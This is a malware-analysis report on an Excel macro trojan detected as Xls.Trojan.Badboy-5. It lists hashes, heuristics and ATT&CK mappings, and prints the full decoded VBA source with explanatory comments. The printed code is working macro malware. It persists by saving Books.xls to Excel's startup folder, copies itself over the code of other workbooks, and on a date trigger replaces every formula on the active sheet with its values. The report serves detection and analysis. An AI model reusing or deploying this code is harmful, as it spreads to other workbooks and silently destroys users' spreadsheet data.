Xls.Trojan.Badboy-5 — Office (OLE) malware analysis

Static analysis result for SHA-256 fceafe6e40e0c864…

MALICIOUS

Office (OLE)

23.5 KB Created: 2000-08-28 19:09:01 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 5488f23d4e4c94cdaa7ff077604c2514 SHA-1: 461f15d380e0ca0639c49aac655b3cd1a2714480 SHA-256: fceafe6e40e0c8642ef702f62bc969c59519e0a9f5310637801ed8beb55d8c81
120 Risk Score

Malware Insights

Xls.Trojan.Badboy-5 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

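The critical ClamAV detection and the high-severity Workbook_Open macro heuristic indicate malicious intent. On open, the VBA code attempts to establish persistence by saving a workbook carrying a copy of its macro code as 'Books.xls' in the Excel startup path (Application.StartupPath), from which Excel loads workbooks automatically at launch. The extracted macro shows two further behaviors: LookAdd copies the ThisWorkbook code into the active workbook's ThisWorkbook module, so the code spreads to other workbooks, and CheckMsg shows a Yes/No prompt on a 10-minute timer and, on its 'No' branch when a date check matches, pastes the active sheet's cells back as values (replacing formulas) and saves the workbook. Because the persistence location is Excel's own startup folder rather than a Windows Run key or the Windows Startup folder, T1137 (Office Application Startup) is arguably a closer ATT&CK fit than T1547.001. This behavior is characteristic of a trojan designed to maintain a foothold on the system.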

Heuristics 3

  • ClamAV: Xls.Trojan.Badboy-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Badboy-5
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Document defines a Workbook_Open macro, which Excel runs automatically when the workbook is opened with macros enabled

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14015 bytes
SHA-256: f48ac8033a7fe63c7da32d40a9f0727a1ffd84c4356686deb93daaae62a0d439
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sn: file name of the persistent copy. Workbook_Open joins it to
' Application.StartupPath, and CheckMsg uses it to address the scheduled macro.
' Defender note: a "Books.xls" in Excel's startup folder is the on-disk artifact
' this module creates.
Const Sn = "Books.xls"
' CreatSelf: tries to copy this module's code into the active workbook and then
' saves that workbook to the path r.
'   r - full path to save to (Workbook_Open passes StartupPath & "\" & Sn).
Sub CreatSelf(r As String)
    ' Errors are suppressed, so any failing step below is skipped silently.
    On Error Resume Next
    ' Alerts are switched off around the save, so Excel raises no prompt for it.
    Application.DisplayAlerts = False
    ' LookAdd copies the ThisWorkbook code into the active workbook; its
    ' Boolean result is ignored here.
    LookAdd
    Application.ActiveWorkbook.SaveAs r
    Application.DisplayAlerts = True
    On Error GoTo 0
End Sub
' Workbook_Open: auto-run entry point (Excel fires this event when the workbook
' is opened with macros enabled). Ensures a Books.xls copy exists in the Excel
' startup path, then starts the CheckMsg prompt/timer routine.
Private Sub Workbook_Open()
    ' Error suppression is load-bearing: the Workbooks(Sn) lookup below is
    ' expected to fail when Books.xls is not open, leaving s empty.
    On Error Resume Next
    ' Screen updating is off while workbooks are added and switched.
    Application.ScreenUpdating = False
    r = Application.StartupPath & "\" & Sn
    s = Application.Workbooks(Sn).Name
    If s = "" Then
        ' Books.xls is not currently open: remember the current workbook,
        ' add a new workbook (which becomes the active one), and let CreatSelf
        ' copy the code into it and save it as r.
        cf = ActiveWorkbook.Name
        Application.Workbooks.Add
        CreatSelf (r)
        ' Return focus to the workbook that was active before.
        Workbooks(cf).Activate
    End If
    CheckMsg
    Application.ScreenUpdating = True
    On Error GoTo 0
End Sub
' LookAdd: replication routine. Copies the code of this workbook's ThisWorkbook
' module into the ThisWorkbook module of the active workbook.
' Returns False when the active workbook is this workbook or when the target
' module already has at least as many lines as the source; otherwise True.
' NOTE(review): every step runs under On Error Resume Next, so True does not
' prove the copy succeeded. On Excel builds that gate VBProject access behind
' the "Trust access to the VBA project object model" setting these calls
' presumably fail silently - confirm in a sandbox.
Function LookAdd() As Boolean
    On Error Resume Next
    ' Never copy onto itself.
    If ThisWorkbook.Name = ActiveWorkbook.Name Then GoTo NoAdd
    With ActiveWorkbook.VBProject.VBComponents("ThisWorkbook")
        ' s = line count of the source module, m = line count of the target.
        s = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines
        m = .CodeModule.CountOfLines
        ' A target with as many or more lines is left alone (line count is the
        ' only "already infected" check visible here).
        If m >= s Then GoTo NoAdd
        ' Wipe whatever code the target's ThisWorkbook module held.
        Do While .CodeModule.CountOfLines > 0
            .CodeModule.DeleteLines 1, .CodeModule.CountOfLines
        Loop
        ' Copy the source module into the target one line at a time.
        For i = 1 To s
            sl = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(i, 1)
            .CodeModule.InsertLines i, sl
        Next i
        ' Save the modified workbook only if it already has a location on disk
        ' (an empty Path means it was never saved).
        ap = ActiveWorkbook.Path
        If ap <> "" Then ActiveWorkbook.Save
    End With
' No GoTo in this listing targets YesAdd; it is reached by falling through.
YesAdd:
    LookAdd = True
    On Error GoTo 0
    Exit Function
NoAdd:
    LookAdd = False
    On Error GoTo 0
End Function
' LookIt: thin wrapper that runs LookAdd (result ignored) and turns screen
' updating back on. No caller is visible in this listing.
Sub LookIt()
    On Error Resume Next
    LookAdd
    Application.ScreenUpdating = True
    On Error GoTo 0
End Sub
' CheckMsg: prompt-and-payload routine. Shows a random Yes/No message box,
' attempts replication via LookAdd on "Yes", runs the formula-flattening payload
' on "No" when the date check matches, and re-schedules itself 10 minutes later.
Sub CheckMsg()
    On Error Resume Next
    Dim RndResult As Integer, C As Integer
    Dim MsgS(1 To 4) As String, YesS(1 To 2) As String, NoS(1 To 2) As String
    ' Ot is Static so the previously scheduled run time survives between calls.
    Static Ot As Date
    ' Cancel the run scheduled by the previous call (schedule:=False); on the
    ' first call nothing is scheduled and the error is suppressed.
    Application.OnTime Ot, Sn & "!ThisWorkbook.CheckMsg", schedule:=False
    ' NOTE(review): the string literals below are mojibake in this listing. They
    ' look like double-byte text (probably GBK/GB2312 Chinese) decoded with a
    ' single-byte code page during extraction, and appear to be invitation-style
    ' prompts - confirm by re-decoding the raw module. Left untouched here.
    MsgS(1) = "ÎÒ²ÂÏë,ÄãÒ»¶¨ºÜ¿É°®,Ô¼Äãµ½½ÖÐĹ«Ô°É¢É¢²½,Äã²»½éÒâ°É !"
    MsgS(2) = "½ñÌìµÄÒ¹¾°Í¦ÃÀ , Ô¼Äãµ½ÒôÀÖ¿§·È¹Ý×ø×ø,ºÃÂð ?!"
    MsgS(3) = "Ù»Ãà ! ¼ûµ½ÄãÕæ¸ßÐË,½ñÍíÔ¼Äãµ½µÄÊ¿¸ßÌøÎè,²»ÖªÒâÏÂÈçºÎ !"
    MsgS(4) = "С²öè ! ÔÛÃÇ»¹ÊÇÏȽâ¾öÄãµÄ²ö×ìÎÊÌâ,´óÅŵµÈçºÎ !"
    YesS(1) = "Ì«ºÃÁË, ¼ûÃæºóÎÒÒ»¶¨ÒªÇë½ÌÄãµÄ·¼Ãû !"
    YesS(2) = "×¢Òâ , ÎÒÊÖÖÐÄÃ×ÅÒ»ÊøÏÊ»¨ÔÚÃſڵÈÄã !"
    NoS(1) = "Õæ²»ÇÉ , Õâ¸öµØ·½ÒѾ­Í£ÒµÁË !"
    NoS(2) = "¿´ÎÒÕâ¼ÇÐÔ , ¾ÓÈ»ÍüÁËÄǸöµØ·½ÔÚÄĶù !"
    Randomize
    ' Pick one of the four prompts at random.
    RndResult = Int((4 * Rnd) + 1)
    C = MsgBox(MsgS(RndResult), vbYesNo, "Ï£ÍûÄãÄܽÓÊÜÎÒµÄÑûÇë!")
    Randomize
    If C = vbYes Then
        ' Evaluating LookAdd here runs the replication routine against the
        ' active workbook; "Yes" is only honored when it returns True.
        If LookAdd = True Then
            RndResult = Int((2 * Rnd) + 1)
            MsgBox YesS(RndResult), vbOKOnly, "ºÍÄãÔ¼»á,ÎҺÿªÐÄŶ!"
        Else
            ' Replication did not happen: fall through to the "No" branch.
            C = vbNo
        End If
    End If
    If C = vbNo Then
        'Bad boy
        Application.ScreenUpdating = False
        ' Payload gate: last character of Date$ must be 1.
        ' NOTE(review): if Date$ yields mm-dd-yyyy this keys on the last digit
        ' of the year rather than the day - confirm against the VBA runtime.
        If Right(Date$, 1) = 1 Then
            ' Remember the user's selection, select every cell on the active
            ' sheet, and paste the copied cells back as values only, which
            ' replaces formulas with their current results.
            ol = Selection.Address
            Cells.Select
            Application.CutCopyMode = False
            Selection.Copy
            Selection.PasteSpecial Paste:=xlValues, Operation:=xlNone, SkipBlanks:= _
                False, Transpose:=False
            Application.CutCopyMode = False
            ' Restore the original selection so the change is less visible.
            Range(ol).Select
            ' Persist the change if the workbook already has a location on disk.
            ap = ActiveWorkbook.Path
            If ap <> "" Then ActiveWorkbook.Save
        End If
        Application.ScreenUpdating = True
        RndResult = Int((2 * Rnd) + 1)
        MsgBox NoS(RndResult), vbOKOnly, "Íò·ÖÒź¶,Ï£ÍûÏ´λ¹Óлú»á!"
    End If
    ' Schedule the next run of this routine, addressed through Books.xls,
    ' ten minutes from now.
    Ot = Now + TimeValue("00:10:00")
    Application.OnTime Ot, Sn & "!ThisWorkbook.CheckMsg"
    On Error GoTo 0
End Sub


































Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_Pre
... (truncated)